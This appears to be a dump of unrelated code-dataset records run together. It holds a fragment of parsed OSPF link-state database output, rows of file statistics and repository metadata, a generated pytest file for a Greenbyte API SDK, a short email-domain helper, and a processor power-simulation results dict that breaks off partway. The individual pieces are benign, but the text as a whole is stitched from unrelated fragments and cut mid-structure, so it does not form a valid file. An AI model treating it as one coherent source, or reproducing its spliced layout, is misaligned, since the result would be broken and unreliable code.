"10.186.5.1": {
"link_data": "10.186.5.1",
"link_id": "10.186.5.1",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.151.22.22": {
"link_data": "0.0.0.14",
"link_id": "10.151.22.22",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 111,
"mt_id": 0,
"tos": 0,
}
},
"type": "another router (point-to-point)",
},
},
"num_of_links": 2,
}
},
"header": {
"adv_router": "10.229.11.11",
"age": 651,
"area_border_router": True,
"as_boundary_router": True,
"checksum": "0x9CE3",
"length": 48,
"lsa_id": "10.229.11.11",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "8000003E",
"type": 1,
},
},
},
"10.151.22.22 10.151.22.22": {
"adv_router": "10.151.22.22",
"lsa_id": "10.151.22.22",
"ospfv2": {
"body": {
"router": {
"links": {
"10.229.11.11": {
"link_data": "0.0.0.6",
"link_id": "10.229.11.11",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "another router (point-to-point)",
},
"10.229.6.6": {
"link_data": "10.229.6.2",
"link_id": "10.229.6.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 40,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
},
"num_of_links": 2,
}
},
"header": {
"adv_router": "10.151.22.22",
"age": 480,
"area_border_router": True,
"as_boundary_router": True,
"checksum": "0xC41A",
"length": 48,
"lsa_id": "10.151.22.22",
"option": "None",
"option_desc": "No TOS-capability, No DC",
"seq_num": "80000019",
"type": 1,
},
},
},
"10.36.3.3 10.36.3.3": {
"adv_router": "10.36.3.3",
"lsa_id": "10.36.3.3",
"ospfv2": {
"body": {
"router": {
"links": {
"10.19.7.7": {
"link_data": "10.19.7.3",
"link_id": "10.19.7.7",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
}
},
"num_of_links": 1,
}
},
"header": {
"adv_router": "10.36.3.3",
"age": 1128,
"area_border_router": True,
"as_boundary_router": True,
"checksum": "0x5845",
"length": 36,
"lsa_id": "10.36.3.3",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000035",
"type": 1,
},
},
},
"10.115.55.55 10.115.55.55": {
"adv_router": "10.115.55.55",
"lsa_id": "10.115.55.55",
"ospfv2": {
"body": {
"router": {
"links": {
"10.186.5.1": {
"link_data": "10.186.5.5",
"link_id": "10.186.5.1",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.115.6.6": {
"link_data": "10.115.6.5",
"link_id": "10.115.6.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 30,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.115.55.55": {
"link_data": "255.255.255.255",
"link_id": "10.115.55.55",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 3,
}
},
"header": {
"adv_router": "10.115.55.55",
"age": 318,
"checksum": "0xE7BC",
"length": 60,
"lsa_id": "10.115.55.55",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000037",
"type": 1,
},
},
},
"10.84.66.66 10.84.66.66": {
"adv_router": "10.84.66.66",
"lsa_id": "10.84.66.66",
"ospfv2": {
"body": {
"router": {
"links": {
"10.229.6.6": {
"link_data": "10.229.6.6",
"link_id": "10.229.6.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.115.6.6": {
"link_data": "10.115.6.6",
"link_id": "10.115.6.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 30,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.166.7.6": {
"link_data": "10.166.7.6",
"link_id": "10.166.7.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 30,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.84.66.66": {
"link_data": "255.255.255.255",
"link_id": "10.84.66.66",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 4,
}
},
"header": {
"adv_router": "10.84.66.66",
"age": 520,
"checksum": "0x1282",
"length": 72,
"lsa_id": "10.84.66.66",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "8000003C",
"type": 1,
},
},
},
"10.1.77.77 10.1.77.77": {
"adv_router": "10.1.77.77",
"lsa_id": "10.1.77.77",
"ospfv2": {
"body": {
"router": {
"links": {
"10.19.7.7": {
"link_data": "10.19.7.7",
"link_id": "10.19.7.7",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.166.7.6": {
"link_data": "10.166.7.7",
"link_id": "10.166.7.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 30,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.1.77.77": {
"link_data": "255.255.255.255",
"link_id": "10.1.77.77",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 3,
}
},
"header": {
"adv_router": "10.1.77.77",
"age": 288,
"checksum": "0x1379",
"length": 60,
"lsa_id": "10.1.77.77",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000030",
"type": 1,
},
},
},
},
}
}
}
}
}
},
"3": {
"areas": {
"0.0.0.0": {
"database": {
"lsa_types": {
1: {
"lsa_type": 1,
"lsas": {
"10.115.11.11 10.115.11.11": {
"adv_router": "10.115.11.11",
"lsa_id": "10.115.11.11",
"ospfv2": {
"body": {
"router": {
"links": {
"10.115.11.11": {
"link_data": "255.255.255.255",
"link_id": "10.115.11.11",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
}
},
"num_of_links": 1,
}
},
"header": {
"adv_router": "10.115.11.11",
"age": 50,
"as_boundary_router": True,
"checksum": "0x881A",
"length": 36,
"lsa_id": "10.115.11.11",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000001",
"type": 1,
},
},
}
},
}
}
}
},
"0.0.0.11": {
"database": {
"lsa_types": {
1: {
"lsa_type": 1,
"lsas": {
"10.115.11.11 10.115.11.11": {
"adv_router": "10.115.11.11",
"lsa_id": "10.115.11.11",
"ospfv2": {
"body": {
"router": {
"num_of_links": 0
}
},
"header": {
"adv_router": "10.115.11.11",
"age": 8,
"as_boundary_router": True,
"checksum": "0x1D1B",
"length": 24,
"lsa_id": "10.115.11.11",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000001",
"type": 1,
},
},
}
},
}
}
}
},
}
},
}
}
}
}
}
}
| 81.435696
| 118
| 0.094289
| 1,797
| 62,054
| 3.102393
| 0.067891
| 0.038744
| 0.043049
| 0.043049
| 0.888969
| 0.838027
| 0.756771
| 0.749058
| 0.731659
| 0.631211
| 0
| 0.169689
| 0.850711
| 62,054
| 761
| 119
| 81.542707
| 0.432103
| 0
| 0
| 0.607096
| 0
| 0
| 0.098962
| 0
| 0
| 0
| 0.00116
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6e5cf0af4754b37e4fbdd950657f8e724513ac01
| 13,007
|
py
|
Python
|
tests/controllers/test_data_controller.py
|
charlie9578/greenbyte-api-sdk
|
6835ee1f6a667b5c7827c5248391081f06b75513
|
[
"MIT"
] | null | null | null |
tests/controllers/test_data_controller.py
|
charlie9578/greenbyte-api-sdk
|
6835ee1f6a667b5c7827c5248391081f06b75513
|
[
"MIT"
] | null | null | null |
tests/controllers/test_data_controller.py
|
charlie9578/greenbyte-api-sdk
|
6835ee1f6a667b5c7827c5248391081f06b75513
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
greenbyteapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
import jsonpickle
import dateutil.parser
from .controller_test_base import ControllerTestBase
from ..test_helper import TestHelper
from greenbyteapi.api_helper import APIHelper
class DataControllerTests(ControllerTestBase):
@classmethod
def setUpClass(cls):
super(DataControllerTests, cls).setUpClass()
cls.controller = cls.api_client.data
# Gets authorized data signals for one or more devices.
#
#_🔐 This endpoint requires the **Data** endpoint permission._
#
#_This request can also be made using the POST method,
#with a request to `datasignals.json` and
#a JSON request body instead of query parameters._
#
def test_test_get_data_signals(self):
# Parameters for the API call
device_ids = APIHelper.json_deserialize('[1,2,3]')
# Perform the API call through the SDK function
result = self.controller.get_data_signals(device_ids)
# Test response code
self.assertEquals(self.response_catcher.response.status_code, 200)
# Test headers
expected_headers = {}
expected_headers['content-type'] = 'application/json; charset=utf-8'
self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers))
# Test whether the captured response is as we expected
self.assertIsNotNone(result)
expected_body = APIHelper.json_deserialize(
'[{"dataSignalId":1,"title":"Wind speed","type":"Wind speed","unit":"m/s","'
'deviceType":{"deviceTypeId":1,"title":"Turbine"}},{"dataSignalId":5,"title"'
':"Power","type":"Power","unit":"kW","deviceType":{"deviceTypeId":1,"title":'
'"Turbine"}}]'
)
received_body = APIHelper.json_deserialize(self.response_catcher.response.raw_body)
self.assertTrue(TestHelper.match_body(expected_body, received_body))
# Gets authorized data signals for one or more devices.
#
#_🔐 This endpoint requires the **Data** endpoint permission._
#
#_This request can also be made using the POST method,
#with a request to `datasignals.json` and
#a JSON request body instead of query parameters._
#
def test_test_get_data_signals_1(self):
# Parameters for the API call
device_ids = APIHelper.json_deserialize('[1,2,3]')
# Perform the API call through the SDK function
result = self.controller.get_data_signals(device_ids)
# Test response code
self.assertEquals(self.response_catcher.response.status_code, 204)
# Gets data for multiple devices and data signals in the given
#resolution. The timestamps are in the time zone configured in the Greenbyte Platform.
#Use the useUtc flag to get timestamps in UTC for all resolutions other than daily, weekly, monthly and yearly.
#
#_🔐 This endpoint requires the **Data** endpoint permission._
#
#_This request can also be made using the POST method,
#with a request to `data.json` and
#a JSON request body instead of query parameters._
#
def test_test_get_data(self):
# Parameters for the API call
device_ids = APIHelper.json_deserialize('[1,2,3]')
data_signal_ids = APIHelper.json_deserialize('[1,5]')
timestamp_start = APIHelper.RFC3339DateTime.from_value('2020-01-01T00:00:00Z').datetime
timestamp_end = APIHelper.RFC3339DateTime.from_value('2020-01-08T00:00:00Z').datetime
use_utc = False
resolution = '10minute'
aggregate = 'device'
aggregate_level = 0
calculation = 'sum'
# Perform the API call through the SDK function
result = self.controller.get_data(device_ids, data_signal_ids, timestamp_start, timestamp_end, use_utc, resolution, aggregate, aggregate_level, calculation)
# Test response code
self.assertEquals(self.response_catcher.response.status_code, 200)
# Test headers
expected_headers = {}
expected_headers['content-type'] = 'application/json; charset=utf-8'
self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers))
# Test whether the captured response is as we expected
self.assertIsNotNone(result)
expected_body = APIHelper.json_deserialize(
'[{"aggregate":"device","aggregateId":1,"aggregatePathNames":[],"deviceIds"'
':[1],"resolution":"hourly","calculation":"sum","dataSignal":{"dataSignalId"'
':1,"title":"Wind speed","unit":"m/s"},"data":{"2020-01-01T00:00:00":6.89,"2'
'020-01-01T01:00:00":8.33}},{"aggregate":"device","aggregateId":1,"aggregate'
'PathNames":[],"deviceIds":[1],"resolution":"hourly","calculation":"sum","da'
'taSignal":{"dataSignalId":5,"title":"Power","unit":"kW"},"data":{"2020-01-0'
'1T00:00:00":584.33,"2020-01-01T01:00:00":1014}}]'
)
received_body = APIHelper.json_deserialize(self.response_catcher.response.raw_body)
self.assertTrue(TestHelper.match_body(expected_body, received_body))
# Gets data for multiple devices and data signals in the given
#resolution. The timestamps are in the time zone configured in the Greenbyte Platform.
#Use the useUtc flag to get timestamps in UTC for all resolutions other than daily, weekly, monthly and yearly.
#
#_🔐 This endpoint requires the **Data** endpoint permission._
#
#_This request can also be made using the POST method,
#with a request to `data.json` and
#a JSON request body instead of query parameters._
#
def test_test_get_data_1(self):
# Parameters for the API call
device_ids = APIHelper.json_deserialize('[1,2,3]')
data_signal_ids = APIHelper.json_deserialize('[1,5]')
timestamp_start = APIHelper.RFC3339DateTime.from_value('2020-01-01T00:00:00Z').datetime
timestamp_end = APIHelper.RFC3339DateTime.from_value('2020-01-08T00:00:00Z').datetime
use_utc = False
resolution = '10minute'
aggregate = 'device'
aggregate_level = 0
calculation = 'sum'
# Perform the API call through the SDK function
result = self.controller.get_data(device_ids, data_signal_ids, timestamp_start, timestamp_end, use_utc, resolution, aggregate, aggregate_level, calculation)
# Test response code
self.assertEquals(self.response_catcher.response.status_code, 204)
# Gets the most recent data point for each
#specified device and data signal. The timestamps are in UTC.
#
#_🔐 This endpoint requires the **Data** endpoint permission._
#
#_This request can also be made using the POST method,
#with a request to `realtimedata.json` and
#a JSON request body instead of query parameters._
#
def test_test_get_real_time_data(self):
# Parameters for the API call
device_ids = APIHelper.json_deserialize('[1,2,3]')
data_signal_ids = APIHelper.json_deserialize('[1,5]')
aggregate = 'device'
aggregate_level = 0
calculation = 'sum'
# Perform the API call through the SDK function
result = self.controller.get_real_time_data(device_ids, data_signal_ids, aggregate, aggregate_level, calculation)
# Test response code
self.assertEquals(self.response_catcher.response.status_code, 200)
# Test headers
expected_headers = {}
expected_headers['content-type'] = 'application/json; charset=utf-8'
self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers))
# Test whether the captured response is as we expected
self.assertIsNotNone(result)
expected_body = APIHelper.json_deserialize(
'[{"aggregate":"device","aggregateId":24,"aggregatePathNames":[],"deviceIds'
'":[24],"calculation":"sum","dataSignal":{"dataSignalId":5,"title":"Power","'
'unit":"kW"},"data":{"2020-03-17T12:50:02Z":2174}},{"aggregate":"device","ag'
'gregateId":24,"aggregatePathNames":[],"deviceIds":[24],"calculation":"sum",'
'"dataSignal":{"dataSignalId":1,"title":"Wind speed","unit":"m/s"},"data":{"'
'2020-03-17T12:50:02Z":12.2}}]'
)
received_body = APIHelper.json_deserialize(self.response_catcher.response.raw_body)
self.assertTrue(TestHelper.match_body(expected_body, received_body))
# Gets the most recent data point for each
#specified device and data signal. The timestamps are in UTC.
#
#_🔐 This endpoint requires the **Data** endpoint permission._
#
#_This request can also be made using the POST method,
#with a request to `realtimedata.json` and
#a JSON request body instead of query parameters._
#
def test_test_get_real_time_data_1(self):
# Parameters for the API call
device_ids = APIHelper.json_deserialize('[1,2,3]')
data_signal_ids = APIHelper.json_deserialize('[1,5]')
aggregate = 'device'
aggregate_level = 0
calculation = 'sum'
# Perform the API call through the SDK function
result = self.controller.get_real_time_data(device_ids, data_signal_ids, aggregate, aggregate_level, calculation)
# Test response code
self.assertEquals(self.response_catcher.response.status_code, 204)
# Gets signal data aggregated per availability contract category.
#
#_🔐 This endpoint requires the **Data** and **Statuses** endpoint permissions._
#
#_This request can also be made using the POST method,
#with a request to `datapercategory.json` and
#a JSON request body instead of query parameters._
#
def test_test_get_data_per_category(self):
# Parameters for the API call
device_ids = APIHelper.json_deserialize('[1,2,3]')
data_signal_id = 248
timestamp_start = APIHelper.RFC3339DateTime.from_value('2020-01-01T00:00:00Z').datetime
timestamp_end = APIHelper.RFC3339DateTime.from_value('2020-01-08T00:00:00Z').datetime
aggregate = 'device'
aggregate_level = 0
category = APIHelper.json_deserialize('["stop"]')
# Perform the API call through the SDK function
result = self.controller.get_data_per_category(device_ids, data_signal_id, timestamp_start, timestamp_end, aggregate, aggregate_level, category)
# Test response code
self.assertEquals(self.response_catcher.response.status_code, 200)
# Test headers
expected_headers = {}
expected_headers['content-type'] = 'application/json; charset=utf-8'
self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers))
# Test whether the captured response is as we expected
self.assertIsNotNone(result)
expected_body = APIHelper.json_deserialize(
'{"dataSignal":{"dataSignalId":248,"title":"Lost Production (Contractual)",'
'"unit":"kWh"},"calculation":"sum","data":[{"aggregateId":6,"aggregatePathNa'
'mes":[],"deviceIds":[1,2,3],"contractTitle":"Vestas 1","categoryTitle":"Ici'
'ng","categoryTime":"available","value":104.55,"duration":150},{"aggregateId'
'":6,"aggregatePathNames":[],"deviceIds":[1,2,3],"contractTitle":"Vestas 1",'
'"categoryTitle":"Utility","categoryTime":"excluded","value":73,"duration":5'
'0.3}]}'
)
received_body = APIHelper.json_deserialize(self.response_catcher.response.raw_body)
self.assertTrue(TestHelper.match_body(expected_body, received_body))
# Gets signal data aggregated per availability contract category.
#
#_🔐 This endpoint requires the **Data** and **Statuses** endpoint permissions._
#
#_This request can also be made using the POST method,
#with a request to `datapercategory.json` and
#a JSON request body instead of query parameters._
#
def test_test_get_data_per_category_1(self):
# Parameters for the API call
device_ids = APIHelper.json_deserialize('[1,2,3]')
data_signal_id = 248
timestamp_start = APIHelper.RFC3339DateTime.from_value('2020-01-01T00:00:00Z').datetime
timestamp_end = APIHelper.RFC3339DateTime.from_value('2020-01-08T00:00:00Z').datetime
aggregate = 'device'
aggregate_level = 0
category = APIHelper.json_deserialize('["stop"]')
# Perform the API call through the SDK function
result = self.controller.get_data_per_category(device_ids, data_signal_id, timestamp_start, timestamp_end, aggregate, aggregate_level, category)
# Test response code
self.assertEquals(self.response_catcher.response.status_code, 204)
| 44.392491
| 164
| 0.677404
| 1,580
| 13,007
| 5.417722
| 0.141772
| 0.033411
| 0.061682
| 0.050467
| 0.904439
| 0.891355
| 0.880841
| 0.880841
| 0.851636
| 0.851636
| 0
| 0.037015
| 0.212808
| 13,007
| 292
| 165
| 44.544521
| 0.798222
| 0.287384
| 0
| 0.656716
| 1
| 0.044776
| 0.227213
| 0.164153
| 0
| 0
| 0
| 0
| 0.149254
| 1
| 0.067164
| false
| 0
| 0.037313
| 0
| 0.11194
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6e9f85035b6d740909725f57329e6ef52d71d304
| 252
|
py
|
Python
|
codesignal/string/findEmailDomain.py
|
peterlamar/python-cp-cheatsheet
|
f9f854064a3c657c04fab27d0a496401bfa97da1
|
[
"Apache-2.0"
] | 140
|
2020-10-21T13:23:52.000Z
|
2022-03-31T15:09:45.000Z
|
codesignal/string/findEmailDomain.py
|
ajibolashodipo/python-cp-cheatsheet
|
f9f854064a3c657c04fab27d0a496401bfa97da1
|
[
"Apache-2.0"
] | 1
|
2021-07-22T14:01:25.000Z
|
2021-07-22T14:01:25.000Z
|
codesignal/string/findEmailDomain.py
|
ajibolashodipo/python-cp-cheatsheet
|
f9f854064a3c657c04fab27d0a496401bfa97da1
|
[
"Apache-2.0"
] | 33
|
2020-10-21T14:17:02.000Z
|
2022-03-25T11:25:03.000Z
|
"""
For address = "prettyandsimple@example.com", the output should be
findEmailDomain(address) = "example.com";
"""
def findEmailDomain(address):
return address.split('@')[-1]
def findEmailDomain(address):
return address[address.rfind('@')+1:]
| 28
| 65
| 0.710317
| 28
| 252
| 6.392857
| 0.535714
| 0.368715
| 0.27933
| 0.346369
| 0.424581
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008969
| 0.115079
| 252
| 9
| 66
| 28
| 0.793722
| 0.424603
| 0
| 0.5
| 0
| 0
| 0.014493
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
6edff66812ee71ae6adde099ab3aab58d28ba6ce
| 68,626
|
py
|
Python
|
benchmarks/SimResults/micro_pinned_train_combos/cmpB_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpB_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpB_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.302632,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.44039,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.74064,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.728653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.26176,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.723657,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.71407,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.453379,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 8.84284,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.328844,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0264143,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.299986,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.19535,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.62883,
'Execution Unit/Register Files/Runtime Dynamic': 0.221764,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.807798,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.80673,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 5.58833,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00113814,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00113814,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000994454,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000386686,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00280621,
